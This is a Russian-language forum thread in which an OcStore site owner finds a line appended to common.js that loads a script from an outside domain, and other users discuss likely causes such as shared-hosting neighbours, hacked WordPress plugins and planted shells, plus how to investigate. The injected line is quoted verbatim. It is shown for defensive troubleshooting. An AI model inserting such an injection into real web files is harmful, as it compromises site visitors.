Взлом через common.js

[IIIBarsik]

Старый сайт:

OcStore 1.5 

Тема стандартная (defaut) 

 

Сегодня зашел на него, а он грузится почти минуту. Полез смотреть в начале через chrome, что увидел: 

что то такое (картинка из инета)

В хидере под тегом <head> был скрипт с ссылкой на на данный ресурс. 

Побежал в header.tpl (catalog\view\theme\default\template\common) увидел там такую вещь: 

<?php foreach ($scripts as $script) { ?>
<script type="text/javascript" src="<?php echo $script; ?>"></script>
<?php } ?>

Понимаю, что данная херота может инклудится вот сюда из любого файла

Нашел ее довольно быстро, а именно в catalog\view\javascript\common.js

В конце файла была приписка:

document.write('<script src="https://afrodizinlife.gq"><\x2fscript>');

Собственно вопрос:

Как такие вещи вообще происходят на opencart?

P.S. По поводу паролей можно не писать: 

1. 10 значные с спецсимволами + регистры

2. В браузере не храню

3. В FileZilla тоже не храню

Я, конечно, понимаю, что все зависит от определенной сборки, шаблона и установленного на сайт, но есть ли основные дыры, которые необходимо латать? 

Или какие то минимумы, что необходимо сделать всем и вся? 

[IIIBarsik]

И да, если кто нибудь сможет мне пояснить, что делала у меня на сайте, буду благодарен

[spectre]

5 минут назад, IIIBarsik сказал:

И да, если кто нибудь сможет мне пояснить, что эта херота делала у меня на сайте, буду благодарен

майнила что-то или в гугл страницу подменяла

подобные взломы в опенкарте обычно от соседей и украденных паролей

[prived]

Ой да ладно ) залез от соседа по хостингу и все) мало ли что 

[niger]

Модули с файлопомоек или взломанные ставили? Если нет. То рядом с вами или прям на вашем хостинг-аккаунте мог быть вордпресс, их ломают и всем кто рядом суют гадости.

Змінено 10 вересня 2018 користувачем niger

[freelancer]

посмотрите дату редактирования файла common.js

далее запросите у хостера access.log за эту дату

[markimax]

41 минуту назад, freelancer сказал:

посмотрите дату редактирования файла common.js

далее запросите у хостера access.log за эту дату

+1 Сняли с "языка"
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер
 

[IIIBarsik]

В 10.09.2018 в 18:13, markimax сказал:

+1 Сняли с "языка"
ТС  - скорее всего вас взломали через "соседей", просто ботом внедрили в попавшиеся JS, свой код
Или какой то нерадивый "студент" (который выполнял у вас работы) вам подсунул шелл и внедрил потом майнер
 

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

[spectre]

4 минуты назад, IIIBarsik сказал:

Можете подробнее объяснить суть взлома через "соседей"? 

"студент" отметается, ибо доступ только у 2 человек

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

[IIIBarsik]

30 минут назад, spectre сказал:

рядом лежит вордпресс с плагинами бесплатно и без смс

либо у хостера виртуалхосты не изолированы и из скриптика можно получить доступ к соседним сайтам на других аккаунтах, таких много

Т.е. и в том и в другом случаях виртуалхосты не изолированны друг от друга, верно? Иначе я просто не понимаю по какой гейской магии сосед может влиять на меня